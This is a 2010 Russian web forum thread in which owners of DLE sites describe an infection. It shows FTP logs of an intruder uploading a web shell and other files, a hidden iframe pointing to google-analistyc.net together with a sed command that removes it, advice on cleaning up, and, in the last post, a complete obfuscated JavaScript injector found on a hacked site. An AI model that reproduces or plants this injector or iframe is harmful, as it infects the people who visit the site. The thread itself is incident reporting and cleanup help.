Alexwild 1 Опубликовано: 16 апреля 2010 Рассказать Опубликовано: 16 апреля 2010 Вчера получил сообщение от Янлдекса о том что у меня на сайте обнаружен вредоносный код. Визуальный осмотр первоначально не дал никаких результатов. Благо хостер мой hoster24.ru(недавно свалил к нему от mchost - доволен) подсобил мне здорово. Админ заметил в index.php и index.html шифрованный iframe. Прошел все файлы в корне руками почистил, в Яша запросил перепроверку сайта. Пришло письмо все ок. Через 10ть минут опять пришло письмо что заражен. Спасли логи сервака, мой ip скрыт *,*,*: ::ffff:77.*.*.* UNKNOWN alexwild [12/Apr/2010:09:27:53 +0000] "STOR main.tpl" 226 6990 ::ffff:77.*.*.* UNKNOWN alexwild [12/Apr/2010:09:28:05 +0000] "STOR clickun_pup.js" 226 10405 ::ffff:77.*.*.* UNKNOWN alexwild [12/Apr/2010:09:28:05 +0000] "STOR sun128087_ajax.js" 226 6712 ::ffff:77.*.*.* UNKNOWN alexwild [12/Apr/2010:09:28:08 +0000] "RETR index.php" 226 1573 ::ffff:77.*.*.* UNKNOWN alexwild [12/Apr/2010:09:28:32 +0000] "STOR index.php" 226 1392 ::ffff:77.*.*.* UNKNOWN alexwild [13/Apr/2010:11:50:09 +0000] "DELE index.html" 250 604 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:09:13 +0000] "OPTS_UTF8 ON" 500 - ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:11:25 +0000] "RETR .htaccess" 226 4662 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:11:54 +0000] "RETR 1.php" 226 35 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:11:59 +0000] "RETR 1.php" 226 35 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:12:06 +0000] "RETR 1.scf" 226 79 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:12:13 +0000] "RETR 3.5.php" 226 4180 Из данного лога видно что я поставил код партнерки clickunder.ru, залив их скрипт (clickun_pup.js и sun128087_ajax.js)к себе в корень сайта чтобы Яша не переживал из=за попапа. Не могу с уверенностью утверждать что виноваты clickunder но Касперский банит их сайт и все что к ним относится. Но у меня была проблема, я отключил касперского и подхватил некую дрянь через плагин ФФ АдобРидер. Браузер завис, пришлось перегружать. Касперский не отреагировал я соответственно тоже. После проверки компа доктором вебом - freedrweb.ru было выявлено около 6ти Троянов, Касперский продолжал молчать и орал только когда докторВеб что-то находил и пытался удалить. Далее из логов видно что с американского ip создали несколько файлов на фтп. Я скачал на свою тачку все файлы из корня сайта, при скачивании нашел у себя Shell под именем color.php, это был Web Shell by oRbWeb Shell by oRb (ссылка на Гугл описание шела). Достойная штука с кучей возможностей. Я зашол к себе на сайт по http://адрес сайта/color.php и увидел новую админку с приглашением ввести пароль классс просто. Естественно все потер, опять в яшу на пересмотр. Опять все тоже самое - 5минут все ок, потом опять лочит - вредоносный код на сайте!!! При загрузке страницы все летало но внизу в ФФ я заметил код google-analistyc.net (так же может быть analistyc-google.net ). Я точно знал что таких ссылок у меня нет внешних. Стал искать способ разобрать страницу детально:что,откуда и куда грузится. Решение просто как день - FireBug.ru. Инсталим плагин к FF и жмем F12 и видим:что,откуда и куда. Там я заметил фрейм (iframe) в файле /engine/ajax/menu.js. Непонятно откуда но в нем всевремя появлялся фрейм, сколько я его не удалял. Я его просто переименовал, на других сайтах стер. Далее вопрос к разработчикам - как злоумышленники получают доступ данному файлу? Это дыра в скрипте? вот все файлы котрые были заражены: ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:18:08 +0000] "STOR menu.js" 226 3504 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:18:45 +0000] "RETR index.html" 226 614 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:19:10 +0000] "STOR index.html" 226 731 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:19:17 +0000] "RETR index.php" 226 8953 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:19:38 +0000] "STOR index.php" 226 9091 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:19:50 +0000] "RETR index.php" 226 9091 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:20:16 +0000] "STOR index.php" 226 8952 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:22:54 +0000] "RETR menu.js" 226 3368 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:23:12 +0000] "STOR menu.js" 226 3504 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:25:03 +0000] "RETR menu.js" 226 3368 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:25:18 +0000] "STOR menu.js" 226 3504 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:25:26 +0000] "STOR color.php" 226 24904 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:32:36 +0000] "STOR color.php" 226 24904 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:33:54 +0000] "RETR menu.js" 226 4375 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:34:17 +0000] "STOR menu.js" 226 4511 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:12:34:30 +0000] "STOR Ststistic.php" 226 66222 Далее на мой сервак кто-то лез уже с другого ip с украинского хостинга: ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:36 +0000] "RETR toget.html" 226 321 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:37 +0000] "STOR toget.html" 226 3306 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:39 +0000] "RETR toget.html" 226 3306 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:40 +0000] "RETR admin.php" 226 4430 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:41 +0000] "STOR admin.php" 226 4430 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:42 +0000] "RETR admin.php" 226 4430 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:44 +0000] "RETR video1.php" 226 14328 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:45 +0000] "STOR video1.php" 226 17313 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:46 +0000] "RETR video1.php" 226 17313 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:47 +0000] "RETR dumper.php" 226 34380 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:49 +0000] "STOR dumper.php" 226 37365 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:50 +0000] "RETR dumper.php" 226 37365 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:51 +0000] "RETR counter.html" 226 2390 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:52 +0000] "STOR counter.html" 226 5375 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:54 +0000] "RETR counter.html" 226 5375 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:55 +0000] "RETR pvid.php" 226 2394 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:56 +0000] "STOR pvid.php" 226 2394 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:57 +0000] "RETR pvid.php" 226 2394 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:25:59 +0000] "RETR color.php" 226 24904 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:01 +0000] "STOR color.php" 226 24904 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:02 +0000] "RETR color.php" 226 24904 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:03 +0000] "RETR php.php" 226 16 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:04 +0000] "STOR php.php" 226 16 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:05 +0000] "RETR php.php" 226 16 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:07 +0000] "RETR ________index.php" 226 379 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:08 +0000] "STOR ________index.php" 226 379 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:09 +0000] "RETR ________index.php" 226 379 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:10 +0000] "RETR 404.shtml" 226 515 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:11 +0000] "STOR 404.shtml" 226 3500 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:12 +0000] "RETR 404.shtml" 226 3500 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:13 +0000] "RETR autobackup.php" 226 3054 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:14 +0000] "STOR autobackup.php" 226 3054 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:15 +0000] "RETR autobackup.php" 226 3054 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:16 +0000] "RETR sitemap.php" 226 2031 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:17 +0000] "STOR sitemap.php" 226 2031 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:19 +0000] "RETR sitemap.php" 226 2031 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:20 +0000] "RETR sendpage.php" 226 2494 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:21 +0000] "STOR sendpage.php" 226 5479 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:22 +0000] "RETR sendpage.php" 226 5479 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:23 +0000] "RETR 400.shtml" 226 515 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:24 +0000] "STOR 400.shtml" 226 3500 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:28 +0000] "RETR 400.shtml" 226 3500 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:30 +0000] "RETR google5ed79d2d68b58487.html" 226 0 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:31 +0000] "STOR google5ed79d2d68b58487.html" 226 0 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:32 +0000] "RETR google5ed79d2d68b58487.html" 226 0 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:33 +0000] "RETR minichat_update.php" 226 1049 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:34 +0000] "STOR minichat_update.php" 226 1049 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:35 +0000] "RETR minichat_update.php" 226 1049 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:36 +0000] "RETR install_ext.php" 226 138 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:38 +0000] "STOR install_ext.php" 226 138 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:39 +0000] "RETR install_ext.php" 226 138 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:40 +0000] "RETR index.html" 226 447 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:41 +0000] "STOR index.html" 226 3432 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:42 +0000] "RETR index.html" 226 3432 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:44 +0000] "RETR dir.php" 226 70 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:45 +0000] "STOR dir.php" 226 70 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:46 +0000] "RETR dir.php" 226 70 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:47 +0000] "RETR 1.php" 226 35 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:49 +0000] "STOR 1.php" 226 35 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:50 +0000] "RETR 1.php" 226 35 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:51 +0000] "RETR __sendmails.php" 226 3196 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:52 +0000] "STOR __sendmails.php" 226 3196 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:53 +0000] "RETR __sendmails.php" 226 3196 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:54 +0000] "RETR index.php" 226 8648 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:55 +0000] "STOR index.php" 226 8648 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:56 +0000] "RETR index.php" 226 8648 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:57 +0000] "RETR 401.shtml" 226 515 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:26:59 +0000] "STOR 401.shtml" 226 3500 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:00 +0000] "RETR 401.shtml" 226 3500 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:02 +0000] "RETR pay_fail.htm" 226 142 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:03 +0000] "STOR pay_fail.htm" 226 3127 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:04 +0000] "RETR pay_fail.htm" 226 3127 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:05 +0000] "RETR minichat_install.php" 226 1571 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:06 +0000] "STOR minichat_install.php" 226 1571 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:07 +0000] "RETR minichat_install.php" 226 1571 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:08 +0000] "RETR 403.shtml" 226 515 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:09 +0000] "STOR 403.shtml" 226 3500 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:10 +0000] "RETR 403.shtml" 226 3500 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:11 +0000] "RETR goto.php" 226 55 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:13 +0000] "STOR goto.php" 226 55 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:14 +0000] "RETR goto.php" 226 55 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:15 +0000] "RETR ideal_news.htm" 226 5361 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:16 +0000] "STOR ideal_news.htm" 226 5361 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:17 +0000] "RETR ideal_news.htm" 226 5361 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:18 +0000] "RETR 3.5.php" 226 4180 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:20 +0000] "STOR 3.5.php" 226 4180 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:21 +0000] "RETR 3.5.php" 226 4180 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:22 +0000] "RETR 500.shtml" 226 515 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:23 +0000] "STOR 500.shtml" 226 3500 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:24 +0000] "RETR 500.shtml" 226 3500 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:25 +0000] "RETR toget_pri.html" 226 321 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:26 +0000] "STOR toget_pri.html" 226 3306 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:28 +0000] "RETR toget_pri.html" 226 3306 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:29 +0000] "RETR pay_ok.htm" 226 204 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:30 +0000] "STOR pay_ok.htm" 226 3189 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:31 +0000] "RETR pay_ok.htm" 226 3189 ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:32 +0000] "RETR public_html" 550 - ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:33 +0000] "STOR public_html" 550 - ::ffff:195.242.161.43 UNKNOWN alexwild [13/Apr/2010:14:27:34 +0000] "RETR public_html" 550 - Затем опять с америки: ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:14:47:00 +0000] "OPTS_UTF8 ON" 500 - ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:31:56 +0000] "OPTS_UTF8 ON" 500 - ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:34:11 +0000] "RETR index.php" 226 8331 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:34:33 +0000] "STOR index.php" 226 8469 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:35:14 +0000] "RETR index.php" 226 8469 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:36:16 +0000] "STOR index.php" 226 8467 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:36:28 +0000] "RETR index.php" 226 8467 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:36:52 +0000] "STOR index.php" 226 8329 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:37:30 +0000] "RETR menu.js" 226 3368 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:37:49 +0000] "STOR menu.js" 226 3504 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:40:42 +0000] "RETR index.php" 226 8329 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:40:47 +0000] "RETR index.php" 226 8329 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:41:37 +0000] "RETR index.php" 226 8329 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:42:47 +0000] "STOR index.php" 226 11138 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:43:07 +0000] "RETR index.php" 226 11138 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:44:27 +0000] "STOR index.php" 226 8329 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:45:16 +0000] "RETR index.php" 226 8329 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:46:04 +0000] "STOR index.php" 226 8446 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:47:09 +0000] "RETR index.php" 226 8446 ::ffff:64.18.143.184 UNKNOWN alexwild [13/Apr/2010:16:47:24 +0000] "STOR index.php" 226 8329 Или это были два разных человека или один, пока что ясности в вопросе нет. Как и нет уверенности в том что данный инциндент не повторится. С 7ми утра мониторю сервак, пока все чисто. Нашол в сети подобну. проблему у человека. Он предлагал лечить зараженные файлы вот таким скриптом из консоли сервера ssh: grep -R google-analistyc.net . | awk ‘{print $1}’ | cut -d «:» -f 1 | xargs -n1 sed -i » ’s|<\!– ~ –><iframe src=\»http:\/\/google-analistyc.net\/in.cgi?12\» width=\»0\» height=\»0\» style=\»display:none\»><\/iframe><\!– ~ –>||g’ Работает проверено! Трояны на моей тачке были семейства Downloader.JS.*. А вот что пишет гугля про страницу с вредоносом. Естественно после чистки компа и сервера - ЗАМЕНА ВСЕХ ПАРОЛЕЙ!! Желаю всем удачи, жду коментов от разработчиков. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 16 апреля 2010 Рассказать Опубликовано: 16 апреля 2010 Далее вопрос к разработчикам - как злоумышленники получают доступ данному файлу? Это дыра в скрипте? какие скрипты? Поселив троянов у себя на компьютере, вашим доступом по FTP владеют теперь злоумышленники, у вас по логам видно, что все действия выполняются по FTP, а не через скрипты. Тема стара как мир, что делать и как защищаться описано на http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979 http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe никаких уязвимостей в скриптах нет. Цитата Ссылка на сообщение Поделиться на других сайтах
Alexwild 1 Опубликовано: 16 апреля 2010 Рассказать Опубликовано: 16 апреля 2010 Автор Прочитал твои ссылки. Да по сути проблема одинаковая, но проблемы именно с main.js появились не так давно у многих знакомых кто юзает DLE. Я не утверждаю что виноват ты как разработчик, помоему я понятно написал что скорее всего это трой котрый пробил мне браузер. Статью писал для того чтобы народ знал как бороться и что делать в данной ситуации, не паниковал. Цитата Ссылка на сообщение Поделиться на других сайтах
Nektov 59 Опубликовано: 16 апреля 2010 Рассказать Опубликовано: 16 апреля 2010 скорее всего это трой котрый пробил мне браузер Трояны не пробивают браузеры, они пароли воруют. Статью писал для того чтобы народ знал как бороться Он предлагал лечить зараженные файлы вот таким скриптом из консоли сервера ssh: grep -R google-analistyc.net . | awk ‘{print $1}’ | cut -d «:» -f 1 | xargs -n1 sed -i » ’s|<\!– ~ –><iframe src=\»http:\/\/google-analistyc.net\/in.cgi?12\» width=\»0\» height=\»0\» style=\»display:none\»><\/iframe><\!– ~ –>||g’ Не у всех есть доступ к консоли сервера. Вам же написали, чего читать. Могу вкратце повторить: 1. Чистим компьютер, с которого админим сайт; 2. Меняем все логины пароли (ФТП, хостинг, сайт); 3. Проверяем сайт, а точнее файлы на присутствие вредоносного кода. Если сами не умеете, просите хостера. Вот в принципе и всё. P&s. google-analytics.com, он же http://www.google.com/intl/ru/analytics/ - Google Analytics – инструмент веб-аналитики корпоративного уровня. Эта служба позволяет оценить трафик на веб-сайт и эффективность различных маркетинговых мероприятий. Мощные, гибкие и очень простые в использовании функции гарантируют невероятное удобство просмотра и анализа данных по трафику. С Google Analytics вы с легкостью настроите точный таргетинг объявлений, повысите эффективность маркетинговых мероприятий и создадите веб-сайты, позволяющие повысить коэффициент конверсии. google-analistyc.net – какая-то бредятина. Administrative Contact: Ilia Krukover () +7.74012971111 Fax: 236017 Kaliningrad, RU 236017 RU Name Servers: ns1.firstvds.ru ns2.firstvds.ru Dedicated Hosting: google-analistyc.net is hosted on a dedicated server. Цитата Ссылка на сообщение Поделиться на других сайтах
maks1192 96 Опубликовано: 16 апреля 2010 Рассказать Опубликовано: 16 апреля 2010 (изменено) Прочитал твои ссылки. Да по сути... Я не утверждаю что виноват ты как разработчик, помоему я понятно написал... Ты знаешь так хорошо разработчика Владимира, что ты на "ТЫ" базаришь? Изменено 16 апреля 2010 пользователем maks1192 1 Цитата Ссылка на сообщение Поделиться на других сайтах
hotdj 33 Опубликовано: 16 апреля 2010 Рассказать Опубликовано: 16 апреля 2010 А причём тут "БИЧ" ? на сколько я знаю "БИЧ" совсем длругое ))))))) Может ты имел ввиду "ВИЧ" ? Но кнопки "В" и "Б" находятся далеко друг от друга )) 1 Цитата Ссылка на сообщение Поделиться на других сайтах
pro.Ka3Huk 0 Опубликовано: 11 мая 2010 Рассказать Опубликовано: 11 мая 2010 Вот такой код был найден вчера на сайте, на всех страницах в самом верху перед тегом <html>. Даже в админке! <div style="display:none;"><u id=dWdj7Qiq1UKnexI>%hr%b3%bg%21%Bh%22%23%2g%2r%bq%h5%Bb%b3%bg%22%2h%2r%bu%2g%ia%2B%2i%2B%bq%iJ%Bb%hB%hr%bg%b1%2b%bu%25%bq%Bh%22%2b%b2%h5%Bb%bc%23%23%2h%ia%ii%ii%21%bJ%2i%2B%23%bu%bJ%2r%bq%bq%iB%2b%2q%ii%ii%be%2i%iB%2h%bc%2h%hi%22%bg%b3%h5%iu%Bb%hB%hr%ii%bg%b1%2b%bu%25%bq%hB%hr%ii%b3%bg%21%hB</u></div> <script> var Rv6gSqgjm4Gatv=""; var r8WS0XFd2rhvAu = new Array("dWdj7Qiq1UKnexI"); var ID7NVy2PTwiOHx=""; function QiQIRIQ6pdpF3K(r8WS0XFd2rhvAu, LxH48nb8W4qTWo) { return LxH48nb8W4qTWo=document.getElementById(r8WS0XFd2rhvAu[LxH48nb8W4qTWo]).innerHTML; } function fucMp4j2gPJFB7( guJhJLXJfOoWMP ) { return String.fromCharCode(guJhJLXJfOoWMP); } function DIbN4qmT6a2s78(hPeDwbEBDAJ8Qi){ var N0xfwOKAeBviOs=new Array(); var dchnCvPRcsIctb = ""; hPeDwbEBDAJ8Qi = unescape(hPeDwbEBDAJ8Qi); for (var i=0; i<hPeDwbEBDAJ8Qi.length; i++) { dchnCvPRcsIctb = hPeDwbEBDAJ8Qi.charCodeAt(i)-4; N0xfwOKAeBviOs[i]=fucMp4j2gPJFB7(dchnCvPRcsIctb); } return N0xfwOKAeBviOs.join(""); } function Cc3Nqwlu7CcqHj(DwbX9TXQvrMsfu){return DwbX9TXQvrMsfu-1;} function BU5z8MNvT6H5ck(DwbX9TXQvrMsfu, Vus61pIxrL4lEY){ return DwbX9TXQvrMsfu.charAt(Vus61pIxrL4lEY); } function rHVwIsbmLitps9(DwbX9TXQvrMsfu, Vus61pIxrL4lEY){ return DwbX9TXQvrMsfu.indexOf(Vus61pIxrL4lEY); } function oz9FQotrafiMTf(Vus61pIxrL4lEY) { var uV0CHsXEQ3hu45,D57an64fflttDS,wOd2Ykfno3Xdpr,Mq4J7JT1kMX17q="", uO743AwwCvina2="DUAj83i6bea15u9qIXdgRPkfJQswFVG0rp4hzYHKym72BZvLSlCEMt"; for(uV0CHsXEQ3hu45=0;uV0CHsXEQ3hu45<Vus61pIxrL4lEY.length;uV0CHsXEQ3hu45++) {D57an64fflttDS=BU5z8MNvT6H5ck(Vus61pIxrL4lEY,uV0CHsXEQ3hu45); wOd2Ykfno3Xdpr=rHVwIsbmLitps9(uO743AwwCvina2,D57an64fflttDS); if(wOd2Ykfno3Xdpr>=0) { var jD7zPUkb5n3qmg=wOd2Ykfno3Xdpr; if(jD7zPUkb5n3qmg==0) { for(var i=0;i<jD7zPUkb5n3qmg.length-1;i++) { jD7zPUkb5n3qmg[i]+1; } wOd2Ykfno3Xdpr = 53; } else { wOd2Ykfno3Xdpr = Cc3Nqwlu7CcqHj(jD7zPUkb5n3qmg); } Mq4J7JT1kMX17q+=BU5z8MNvT6H5ck(uO743AwwCvina2,wOd2Ykfno3Xdpr); } else {Mq4J7JT1kMX17q+=D57an64fflttDS;} }; hPeDwbEBDAJ8Qi = DIbN4qmT6a2s78(Mq4J7JT1kMX17q); return hPeDwbEBDAJ8Qi; } var HI1HoVrTDGfKUC = r8WS0XFd2rhvAu.length; for (LxH48nb8W4qTWo=0; HI1HoVrTDGfKUC>LxH48nb8W4qTWo; LxH48nb8W4qTWo++) { var Rv6gSqgjm4Gatv=Rv6gSqgjm4Gatv+QiQIRIQ6pdpF3K(r8WS0XFd2rhvAu, LxH48nb8W4qTWo); } var LxH48nb8W4qTWo=oz9FQotrafiMTf(Rv6gSqgjm4Gatv); var jD7zPUkb5n3qmg=document; function H33Gt3m0PBUORK(DwbX9TXQvrMsfu) { jD7zPUkb5n3qmg.write(DwbX9TXQvrMsfu); } H33Gt3m0PBUORK(LxH48nb8W4qTWo); </script> <html> Проверил файлы, они не менялись. По дате по крайней мере. Этот код нигде не смог найти, ни в шаблонах ни в файлах скрипта. Если в настройках скрипта сменить шаблон на какой нить другой и опять включить прежний, то код пропадает со всех страниц в том числе и с админки. Но через некоторое время снова появляется. Версия 7,3 Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.